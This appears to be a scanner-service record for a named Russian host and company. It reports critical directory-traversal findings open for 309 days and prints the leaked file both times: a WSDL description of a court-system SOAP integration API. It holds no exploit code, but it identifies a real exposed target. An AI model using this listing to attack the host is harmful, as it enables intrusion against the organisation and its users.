Host 5.8.180.125
Russia
Closed Joint Stock Company CROC incorporated
  • Detected HTTP traversal vulnerability
    First seen 2021-10-29 03:23
    Last seen 2022-09-03 16:09
    Open for 309 days
    • Severity: critical
      Fingerprint: ac4d53c4832b2491c591c07df70dc1d2e383b0d3c5f197cfc984f56243a40338

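      Found host file through Directory traversal (the retrieved file is a WSDL service description; element and attribute names appear lower-cased in this capture, e.g. `targetnamespace` and `schemalocation`, so it is likely not byte-identical to the file on the host):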
      <?xml version="1.0" encoding="utf-8"?>
      <wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
      	xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap12/"
      	xmlns:xs="http://www.w3.org/2001/xmlschema"
      	xmlns:apisrv="http://arbitr.ru/integration/api/service/v2.17.13"
      	xmlns:api="http://arbitr.ru/integration/api"
      	xmlns:ct="http://arbitr.ru/integration/common"
      	xmlns:wsp="http://www.w3.org/ns/ws-policy"
      	xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
      	xmlns:sp="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702"
      	xmlns:cpxmlsec="urn:ietf:params:xml:ns:cpxmlsec"
      	xmlns:ns="http://arbitr.ru/integration/api/document/common"
      	xmlns:ns1="http://arbitr.ru/integration/messages"
      	xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" targetnamespace="http://arbitr.ru/integration/api/service/v2.17.13">
      	<wsdl:types>
      		<xs:schema>
      			<xs:import schemalocation="apiservice.xsd" namespace="http://arbitr.ru/integration/api"/>
      			<xs:import schemalocation="commontypes.xsd" namespace="http://arbitr.ru/integration/common"/>
      		</xs:schema>
      	</wsdl:types>
      	<wsdl:message name="sendrequestrequestmessage">
      		<wsdl:part name="body" element="api:sendrequestrequest"/>
      	</wsdl:message>
      	<wsdl:message name="sendrequestresponsemessage">
      		<wsdl:part name="body" element="api:sendrequestresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getresponserequestmessage">
      		<wsdl:part name="body" element="api:getresponserequest"/>
      	</wsdl:message>
      	<wsdl:message name="getresponseresponsemessage">
      		<wsdl:part name="body" element="api:getresponseresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getrequestrequestmessage">
      		<wsdl:part name="body" element="api:getrequestrequest"/>
      	</wsdl:message>
      	<wsdl:message name="getrequestresponsemessage">
      		<wsdl:part name="body" element="api:getrequestresponse"/>
      	</wsdl:message>
      	<wsdl:message name="ackrequestmessage">
      		<wsdl:part name="body" element="api:ackrequest"/>
      	</wsdl:message>
      	<wsdl:message name="ackresponsemessage">
      		<wsdl:part name="body" element="api:ackresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getrecoursestatusrequestmessage">
      		<wsdl:part name="body" element="api:getrecoursestatusrequest"/>
      	</wsdl:message>
      	<wsdl:message name="getrecoursestatusresponsemessage">
      		<wsdl:part name="body" element="api:getrecoursestatusresponse"/>
      	</wsdl:message>
      	<wsdl:porttype name="apiporttype">
      		<wsdl:operation name="sendrequest">
      			<wsdl:documentation>операция отправки запроса в api есо</wsdl:documentation>
      			<wsdl:input message="apisrv:sendrequestrequestmessage"/>
      			<wsdl:output message="apisrv:sendrequestresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getresponse">
      			<wsdl:documentation>операция получения ответа от api есо на ранее отправленный запрос</wsdl:documentation>
      			<wsdl:input message="apisrv:getresponserequestmessage"/>
      			<wsdl:output message="apisrv:getresponseresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getrequest">
      			<wsdl:documentation>операция получения запроса от api есо</wsdl:documentation>
      			<wsdl:input message="apisrv:getrequestrequestmessage"/>
      			<wsdl:output message="apisrv:getrequestresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="ack">
      			<wsdl:documentation>операция подтверждения получения ответа от api есо. используется для подтверждения получения ответов, полученных от есо, а также для подтверждения получения запросов, полученных от есо</wsdl:documentation>
      			<wsdl:input message="apisrv:ackrequestmessage"/>
      			<wsdl:output message="apisrv:ackresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getrecoursestatus">
      			<wsdl:documentation>получение информации по поступившем обращениям по идентификатору massageid. используется для сбора статистики контрагентами.</wsdl:documentation>
      			<wsdl:input message="apisrv:getrecoursestatusrequestmessage"/>
      			<wsdl:output message="apisrv:getrecoursestatusresponsemessage"/>
      		</wsdl:operation>
      	</wsdl:porttype>
      	<wsdl:binding name="apisoapbinding" type="apisrv:apiporttype">
      		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
      		<wsp:policyreference uri="#usernameauthandsignedbodypolicy"/>
      		<wsdl:operation name="sendrequest">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/sendrequest"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getresponse">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/getresponse"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getrequest">
      			<soap:operation soapaction="http://mos-gorsud.ru/integration/api/getrequest"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="ack">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/ack"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getrecoursestatus">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/getrecoursestatus"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      	</wsdl:binding>
      	<wsdl:service name="apiservice">
      		<wsdl:documentation>web-service api есо</wsdl:documentation>
      		<wsdl:port name="apiport" binding="apisrv:apisoapbinding">
      			<soap:address location="http://localhost:7001/stub"/>
      		</wsdl:port>
      	</wsdl:service>
      	<wsp:policy wsu:id="signedbodypolicy">
      		<wsp:exactlyone>
      			<wsp:all>
      				<sp:asymmetricbinding>
      					<wsp:policy>
      						<sp:initiatortoken>
      							<wsp:policy>
      								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystorecipient">
      									<wsp:policy>
      										<sp:requirethumbprintreference/>
      									</wsp:policy>
      								</sp:x509token>
      							</wsp:policy>
      						</sp:initiatortoken>
      						<sp:recipienttoken>
      							<wsp:policy>
      								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystoinitiator">
      									<wsp:policy>
      										<sp:requirethumbprintreference/>
      									</wsp:policy>
      								</sp:x509token>
      							</wsp:policy>
      						</sp:recipienttoken>
      						<sp:algorithmsuite>
      							<wsp:policy>
      								<!-- из предлагаемых сьютом алгоритмов допустимо использование только гост р 34.11-2012 для эп и гост р 34.10-2012 для хэширования (допустима длина хэша 256 и 512 бит)-->
      								<cpxmlsec:basicgost/>
      							</wsp:policy>
      						</sp:algorithmsuite>
      						<sp:layout>
      							<wsp:policy>
      								<sp:strict/>
      							</wsp:policy>
      						</sp:layout>
      						<sp:onlysignentireheadersandbody/>
      					</wsp:policy>
      				</sp:asymmetricbinding>
      				<sp:signedparts>
      					<sp:body/>
      				</sp:signedparts>
      			</wsp:all>
      		</wsp:exactlyone>
      	</wsp:policy>
      	<wsp:policy wsu:id="usernameauthenticationpolicy">
      		<wsp:exactlyone>
      			<wsp:all>
      				<sp:supportingtokens>
      					<wsp:policy>
      						<sp:usernametoken sp:includetoken="http://schemas.xmlsoap.org/ws/2005/07/securitypolicy/includetoken/alwaystorecipient">
      							<wsp:policy>
      								<sp:wssusernametoken10/>
      							</wsp:policy>
      						</sp:usernametoken>
      					</wsp:policy>
      				</sp:supportingtokens>
      			</wsp:all>
      		</wsp:exactlyone>
      	</wsp:policy>
      	<wsp:policy wsu:id="usernameauthandsignedbodypolicy">
      		<wsp:all>
      			<wsp:policyreference uri="#signedbodypolicy"/>
      			<wsp:policyreference uri="#usernameauthenticationpolicy"/>
      		</wsp:all>
      	</wsp:policy>
      </wsdl:definitions>
      
      Found on 2021-12-15 15:53
    • Severity: critical
      Fingerprint: ac4d53c4832b2491752255c4aa2352fbb0eca270ee042136f44e55ab4051e159

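      Found host file through Apache traversal (the retrieved content appears to be the same WSDL service description as in the finding dated 2021-12-15):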
      <?xml version="1.0" encoding="utf-8"?>
      <wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
      	xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap12/"
      	xmlns:xs="http://www.w3.org/2001/xmlschema"
      	xmlns:apisrv="http://arbitr.ru/integration/api/service/v2.17.13"
      	xmlns:api="http://arbitr.ru/integration/api"
      	xmlns:ct="http://arbitr.ru/integration/common"
      	xmlns:wsp="http://www.w3.org/ns/ws-policy"
      	xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
      	xmlns:sp="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702"
      	xmlns:cpxmlsec="urn:ietf:params:xml:ns:cpxmlsec"
      	xmlns:ns="http://arbitr.ru/integration/api/document/common"
      	xmlns:ns1="http://arbitr.ru/integration/messages"
      	xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" targetnamespace="http://arbitr.ru/integration/api/service/v2.17.13">
      	<wsdl:types>
      		<xs:schema>
      			<xs:import schemalocation="apiservice.xsd" namespace="http://arbitr.ru/integration/api"/>
      			<xs:import schemalocation="commontypes.xsd" namespace="http://arbitr.ru/integration/common"/>
      		</xs:schema>
      	</wsdl:types>
      	<wsdl:message name="sendrequestrequestmessage">
      		<wsdl:part name="body" element="api:sendrequestrequest"/>
      	</wsdl:message>
      	<wsdl:message name="sendrequestresponsemessage">
      		<wsdl:part name="body" element="api:sendrequestresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getresponserequestmessage">
      		<wsdl:part name="body" element="api:getresponserequest"/>
      	</wsdl:message>
      	<wsdl:message name="getresponseresponsemessage">
      		<wsdl:part name="body" element="api:getresponseresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getrequestrequestmessage">
      		<wsdl:part name="body" element="api:getrequestrequest"/>
      	</wsdl:message>
      	<wsdl:message name="getrequestresponsemessage">
      		<wsdl:part name="body" element="api:getrequestresponse"/>
      	</wsdl:message>
      	<wsdl:message name="ackrequestmessage">
      		<wsdl:part name="body" element="api:ackrequest"/>
      	</wsdl:message>
      	<wsdl:message name="ackresponsemessage">
      		<wsdl:part name="body" element="api:ackresponse"/>
      	</wsdl:message>
      	<wsdl:message name="getrecoursestatusrequestmessage">
      		<wsdl:part name="body" element="api:getrecoursestatusrequest"/>
      	</wsdl:message>
      	<wsdl:message name="getrecoursestatusresponsemessage">
      		<wsdl:part name="body" element="api:getrecoursestatusresponse"/>
      	</wsdl:message>
      	<wsdl:porttype name="apiporttype">
      		<wsdl:operation name="sendrequest">
      			<wsdl:documentation>операция отправки запроса в api есо</wsdl:documentation>
      			<wsdl:input message="apisrv:sendrequestrequestmessage"/>
      			<wsdl:output message="apisrv:sendrequestresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getresponse">
      			<wsdl:documentation>операция получения ответа от api есо на ранее отправленный запрос</wsdl:documentation>
      			<wsdl:input message="apisrv:getresponserequestmessage"/>
      			<wsdl:output message="apisrv:getresponseresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getrequest">
      			<wsdl:documentation>операция получения запроса от api есо</wsdl:documentation>
      			<wsdl:input message="apisrv:getrequestrequestmessage"/>
      			<wsdl:output message="apisrv:getrequestresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="ack">
      			<wsdl:documentation>операция подтверждения получения ответа от api есо. используется для подтверждения получения ответов, полученных от есо, а также для подтверждения получения запросов, полученных от есо</wsdl:documentation>
      			<wsdl:input message="apisrv:ackrequestmessage"/>
      			<wsdl:output message="apisrv:ackresponsemessage"/>
      		</wsdl:operation>
      		<wsdl:operation name="getrecoursestatus">
      			<wsdl:documentation>получение информации по поступившем обращениям по идентификатору massageid. используется для сбора статистики контрагентами.</wsdl:documentation>
      			<wsdl:input message="apisrv:getrecoursestatusrequestmessage"/>
      			<wsdl:output message="apisrv:getrecoursestatusresponsemessage"/>
      		</wsdl:operation>
      	</wsdl:porttype>
      	<wsdl:binding name="apisoapbinding" type="apisrv:apiporttype">
      		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
      		<wsp:policyreference uri="#usernameauthandsignedbodypolicy"/>
      		<wsdl:operation name="sendrequest">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/sendrequest"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getresponse">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/getresponse"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getrequest">
      			<soap:operation soapaction="http://mos-gorsud.ru/integration/api/getrequest"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="ack">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/ack"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      		<wsdl:operation name="getrecoursestatus">
      			<soap:operation soapaction="http://arbitr.ru/integration/api/getrecoursestatus"/>
      			<wsdl:input>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:input>
      			<wsdl:output>
      				<soap:body parts="body" use="literal"/>
      			</wsdl:output>
      		</wsdl:operation>
      	</wsdl:binding>
      	<wsdl:service name="apiservice">
      		<wsdl:documentation>web-service api есо</wsdl:documentation>
      		<wsdl:port name="apiport" binding="apisrv:apisoapbinding">
      			<soap:address location="http://localhost:7001/stub"/>
      		</wsdl:port>
      	</wsdl:service>
      	<wsp:policy wsu:id="signedbodypolicy">
      		<wsp:exactlyone>
      			<wsp:all>
      				<sp:asymmetricbinding>
      					<wsp:policy>
      						<sp:initiatortoken>
      							<wsp:policy>
      								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystorecipient">
      									<wsp:policy>
      										<sp:requirethumbprintreference/>
      									</wsp:policy>
      								</sp:x509token>
      							</wsp:policy>
      						</sp:initiatortoken>
      						<sp:recipienttoken>
      							<wsp:policy>
      								<sp:x509token sp:includetoken="http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702/includetoken/alwaystoinitiator">
      									<wsp:policy>
      										<sp:requirethumbprintreference/>
      									</wsp:policy>
      								</sp:x509token>
      							</wsp:policy>
      						</sp:recipienttoken>
      						<sp:algorithmsuite>
      							<wsp:policy>
      								<!-- из предлагаемых сьютом алгоритмов допустимо использование только гост р 34.11-2012 для эп и гост р 34.10-2012 для хэширования (допустима длина хэша 256 и 512 бит)-->
      								<cpxmlsec:basicgost/>
      							</wsp:policy>
      						</sp:algorithmsuite>
      						<sp:layout>
      							<wsp:policy>
      								<sp:strict/>
      							</wsp:policy>
      						</sp:layout>
      						<sp:onlysignentireheadersandbody/>
      					</wsp:policy>
      				</sp:asymmetricbinding>
      				<sp:signedparts>
      					<sp:body/>
      				</sp:signedparts>
      			</wsp:all>
      		</wsp:exactlyone>
      	</wsp:policy>
      	<wsp:policy wsu:id="usernameauthenticationpolicy">
      		<wsp:exactlyone>
      			<wsp:all>
      				<sp:supportingtokens>
      					<wsp:policy>
      						<sp:usernametoken sp:includetoken="http://schemas.xmlsoap.org/ws/2005/07/securitypolicy/includetoken/alwaystorecipient">
      							<wsp:policy>
      								<sp:wssusernametoken10/>
      							</wsp:policy>
      						</sp:usernametoken>
      					</wsp:policy>
      				</sp:supportingtokens>
      			</wsp:all>
      		</wsp:exactlyone>
      	</wsp:policy>
      	<wsp:policy wsu:id="usernameauthandsignedbodypolicy">
      		<wsp:all>
      			<wsp:policyreference uri="#signedbodypolicy"/>
      			<wsp:policyreference uri="#usernameauthenticationpolicy"/>
      		</wsp:all>
      	</wsp:policy>
      </wsdl:definitions>
      
      Found on 2021-10-29 03:23
Domain summary
No record